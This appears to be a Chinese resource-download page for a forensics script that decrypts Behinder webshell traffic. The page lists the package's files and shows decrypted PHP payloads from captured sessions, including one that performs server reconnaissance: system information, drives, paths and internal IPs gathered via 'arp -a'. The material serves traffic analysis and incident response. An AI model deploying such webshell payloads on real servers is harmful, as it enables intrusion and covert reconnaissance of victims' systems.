HTTP—1
@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
@session_start(); //初始化session,避免connect之后直接background,后续getresult无法获取cookie
echo encrypt(json_encode($result));
}
function Encrypt($data)
{
@session_start();
$key = $_SESSION['k'];
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}
$content="YUhLakxzV2sxRHhrNFNOeXJkckY4cFBtMEFKME9EZ0dyNW90a3JIZjJHbUloV0p3REhxVWVsMmRUSjhmZllzaWhOZWxTbHlHZUprMUg0T0tZd0U5Y3pjTFlqNXA1Y1NPa044WDdsWThBbWtIZ2oyckpTYjBpU3pnVXVXN3VkSThud1J0ek04WGt4dGtxeUxaZks5clV1WUEwU0VmaWNUT0lOVW1pbmRXbDBRRTBmNm1oeUhmWThlWW5qTm5UVFRkc2VIY1lDOTZ4SFNaeUxrWEdpcE9RUkI2TTg1VTRzUkw3ZGNyUFVLdGJFYkdKZHN5blpyU2V5dU1JRlBaUGNJZXRKVWRCSm5xdFdMZkw2TU5kZzhtQzc5MUFQMTdSMzI3NXM3S3VGejA3WFpaU1hzV2ZMakVDZE93emgyS2MyUWRiTm9aZnFRcDBUdGFycFpUaHRhR1lXRkt2YWhseGZLWjVkVlRWUDRRTHZiQW1IOEtnS0xwbU9pZTVsdXhtWEFyRURrQWFzWUFGOGcyc0xoamlqWGJYTDFFRlF0R2FiVkNYU1NRWEJ4MXZNWkFvY29rc2NjR0ZJRDU2ZWFGeWxtQnhjMkpDUDU2ZUlHZzJkRVhhaUhvakZaTTIzRVZXeUtjSDZnVllIRjJoMHBtS0ZnZWg2cVJrRjhEZ2JJSHFOSjhaNmtkZGZZMG1BV2RZYmd2MThuRWltaUMxN21Ob0hQUzhDSnhTcnFleGx1blFodHZxMExBdWk5Z0tzR2Q4QnVWeWNObjN4WjlGRHlBMEljaXJYejVESWY3UDJWQTJLdVphb0p1NEUyMGtEdVhzdm5nNURWUlZnRlh1dVJhNlJYYkJqdjhQejRmZkVxU0Nua3VGM0x3Q2Z5aUdvMlZTYWF4N1BydXltbEZFTkxucTkweHFodW1jcmhrT0NUN09xVnNCOFdRNzdrZE9OWTJOMUd4YmZPZ0ZWY0JtRGxRSHdqN25vSEtJaGtsbDY5bU04b25mM3gxZmViSjBKZ2FX";$content=base64_decode($content);
main($content);
HTTP—2
@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
@session_start(); //初始化session,避免connect之后直接background,后续getresult无法获取cookie
echo encrypt(json_encode($result));
}
function Encrypt($data)
{
@session_start();
$key = $_SESSION['k'];
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}
$content="SzRUSEVoQ2lLM01oU3M1eVhjZWZ6UjFqd255c2ZsWWlYM0VyUUVFWnVyeE1BSEpNUzV1QWpqMVBxaTM3cUM1bjIwTEE2NkRhQnRFS1JRamt1eW5SUTZBRmV6eXhxQWQ3dmlVUHhIQ0hEamd2ZnVpc3ZjR1h5bWpaaWZPV1VvZUdOMmRianYxd3lGalZIWGhhMm9MaXltYVVxUk84UlVncGt0SEp1akdNT2F4aXBkV2R6cURGT3lYNm80OGgwNFB3SHVYMlAzU2d1SW5keWFwN0ZmUTE3aW12OWtBMXdhREQyNUFDSzVCMk5pdUJGR29HS2NhZ2EyZEd4aXdzS0R0eXU1U1hHa3U1UnZOcTBFY0ZDZjExaXFZNXB0NEdYVDZJdkJCR256R2NGTm12SWNxS1h2RlR1RFB3aG1xZzhyWFhWV3JrS1NKWWp2UnFCQzhQdVVra1dKVzRJWVQ2MGlaOXMzUzRwUXhWdDhFVzd1OG5waVJOMjg1YkdTVnFPeng1VUhZN1JUTU5lWnowRkdEcWhZdjdOb0tCMHYxWEZyUFQzUTQ5QjFMMjBKcThpd1FvNDcwS3pGamNWN0FxZjBVNVpaQXRDUDllU2pZNXZ6ZkUyWGEzeVJWTG5USTduUjg0bUw3NUxkNjIyWVRrSFh5TWtVbDFybnNtR1FJQlJ3WjZXYjJnTE8wVHlzME1EMGpRQW14RHdqVTlHQ1U3ZWR3MzdxQkQzRFQzc3FzU29HejZCaUdEbXg0dnhvT21JNzljTGVSZVdmcUlXWnRtdlpGRnBGNThWYVR1UHFPbFdrWjNWSU5mUlp1eVdySG1CeXI1S0xwelZIdlZxT2NJY0ZEaVRWM1ViM2xKV2JsVmQ1QmkxOEFxWFFveUI5Q1pvanV4a0dydkJlcFdUSk02VUM2Sm12dXNIMGdaTEVYZDlPbm53aUVtbFN2TkRhOXFPZGMwb2dwdFYxRXdLWkV6NmVSYkd5QXQwajZZbGs4U2s3Ym5iNjVDeTVIWnRvZ0syU1E0c21DSTh4Q1VwSFJlcXNQMUc=";$content=base64_decode($content);
main($content);
HTTP—3
error_reporting(0);
function main($whatever) {
$result = array();
ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
$driveList ="";
if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
{
for($i=65;$i<=90;$i++)
{
$drive=chr($i).':/';
file_exists($drive) ? $driveList=$driveList.$drive.";":'';
}
}
else
{
$driveList="/";
}
$currentPath=getcwd();
//echo "phpinfo=".$info."
"."currentPath=".$currentPath."
"."driveList=".$driveList;
$osInfo=PHP_OS;
$arch="64";
if (PHP_INT_SIZE == 4) {
$arch = "32";
}
$localIp=gethostbyname(gethostname());
if ($localIp!=$_SERVER['SERVER_ADDR'])
{
$localIp=$localIp." ".$_SERVER['SERVER_ADDR'];
}
$extraIps=getInnerIP();
foreach($extraIps as $ip)
{
if (strpos($localIp,$ip)===false)
{
$localIp=$localIp." ".$ip;
}
}
$basicInfoObj=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo),"arch"=>base64_encode($arch),"localIp"=>base64_encode($localIp));
//echo json_encode($result);
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode(json_encode($basicInfoObj));
//echo json_encode($result);
//echo openssl_encrypt(json_encode($result), "AES128", $key);
echo encrypt(json_encode($result));
}
function getInnerIP()
{
$result = array();
if (is_callable("exec"))
{
$result = array();
exec('arp -a',$sa);
foreach($sa as $s)
{
if (strpos($s,'---')!==false)
{
$parts=explode(' ',$s);
$ip=$parts[1];
array_push($result,$ip);
}
//var_dump(explode(' ',$s));
// array_push($result,explode(' ',$s)[1]);
}
}
return $result;
}
function Encrypt($data)
{
@session_start();
$key = $_SESSION['k'];
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}
$whatever="bEkyWjBWRkY3d1JoYnphSjloemV3ZktGOXZLMElTZUUzMVBRcUY5a3ozcWtER1Q3aTJaYndudlRLZ3JGRURnd2pYblZSQ01tdTAwTw==";$whatever=base64_decode($whatever);
main($whatever);
HTTP—4
@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
@session_start(); //初始化session,避免connect之后直接background,后续getresult无法获取cookie
echo encrypt(json_encode($result));
}
function Encrypt($data)
{
@session_start();
$key = $_SESSION['k'];
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}
$content="V3U3cHVaTnYyTllqcmdKYThTMjVrekVNbzg1cXNkSWlQMDV2YklmY3JqZ0tiMlFlbENBWUVrZ0lFS21QN29KTFdNdnlZNWRub2ZFcGFWT0ZGTmlMNlk3d0FUcko2UHZKZDdWNmV2UEJuZ2I0dkFQUm9kRXFFSTZZT1h6Y0hoRzF4VGpDQWp4VjVtS1p0WlpOd2JwT3ZkQW1DRW5oakgwRm5yWEl2bXBLNU5IWjFqNG12NGpzeWJIQ3dxUHpoUWRqOU4xc1piMEp1VDNUMWNtYjB1cHJZVkV2YURjcTZ5eUVmalNTUFhzNG1Sc2hMekFqaDNLUTBsZEc5NTdzOFJKMHhsNkN3bmxZQmRaaUJHNjc2eG50OG9BN0NDcVNveFdLSGQwV21vVmYxcVdiQ1FRREtDMWg4a3BFbFV1NVZFdmxjRjNyMHBPZlZjNndlcldQdDhXTUplM0hvN2ExaERRV0JmR3NSVGZad0wybDVwU1pISHBoNHFlRjFhYlZyWkNrMDVlZXBkS3UxTGMzVWg3dDdYbGJJZXl4Q3Y2RGFUeDRPMDFybFFoZ01ERlpBck4xdm1RMEdoTG55TDJxc2RkeGFPd1A0RTZmUDNJVjA1bVZScHZ1TUNMSDNMd3ZzdUc0M0tVWkFZREV3MnNndGd5YU9jUXNTNGZZZjlnU1ZzMnFmbUJoV3NwakRsVzZKVGpvQ1d1TFZzbFg1MnRMcGV6NnNBYTg5TjhaQjJjWWtIUXZ2dG5WeTV4Y2RUbUx6aWNTR1g3WG05OGs1VjNwVlJYQWdHMVhvZVhkYjJDNzZibmtJZGIyTnJOa01NU3BYNWdabjVqSWl6RlZlN2M2dXphTXU5d0dOR1BVdXZXclpZSDB1OEhFVVFyWXdZT21NQ1hKZ0VsbEh4SFd6MkN2czRVSm01U1poQURTM1hIaDFuYWNaV3ZpVENaVnB2eFJrYThvMzVRZTJLa21RbWlveG5HZVRqa0xydnRNcktrbVNaVFJEOG42YnpHdlYxZ1c3dHR1NlJGbDJCVFZtM2gxQkxLRmc5MjFQbnoxd04wZDIwelp0dzczSVhIZ2xOVE5qbnNpQlJuUXJEd2dneFNoSk5xTEV3amRKSlJYMkhWR041OFNHMFIyUE1CdDVSWmtDTEkzMVJ5WVJ2SlBmaERldEJkM2RoU2xVdDFXSm9pcXJtaU45ZnNneXlBQXVRdzJZbzV3NW9ESDl6c1BERHU5Q29TaFc4MlA0Sk11Y0xZWDdabndDWlZQR
没有合适的资源?快使用搜索试试~ 我知道了~
取证流量分析冰蝎流量解密python脚本
共13个文件
xml:5个
txt:2个
py:2个
需积分: 0 0 下载量 172 浏览量
2024-10-14
16:21:30
上传
评论
收藏 6.14MB ZIP 举报
温馨提示
设置密钥和文件路径即可一键解密,参考了风二西大佬的视频,结合最新版本的pyshark做了一点点改动 自己本地运行没有问题,如果遇到了报错或有其他问题,欢迎大家批评指正
资源推荐
资源详情
资源评论
收起资源包目录
冰蝎流量脚本.zip (13个子文件)
冰蝎流量脚本
shell.txt 310KB
.idea
workspace.xml 5KB
misc.xml 284B
behinder_decrypt-master.iml 325B
inspectionProfiles
Project_Default.xml 599B
profiles_settings.xml 174B
modules.xml 305B
.gitignore 190B
requirements.txt 104B
__pycache__
Behinder.cpython-310.pyc 56KB
Behinder.py 56KB
流量包检材.pcapng 16.53MB
冰蝎.py 2KB
共 13 条
- 1
资源评论
跑不动的阿超
- 粉丝: 34
- 资源: 2
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功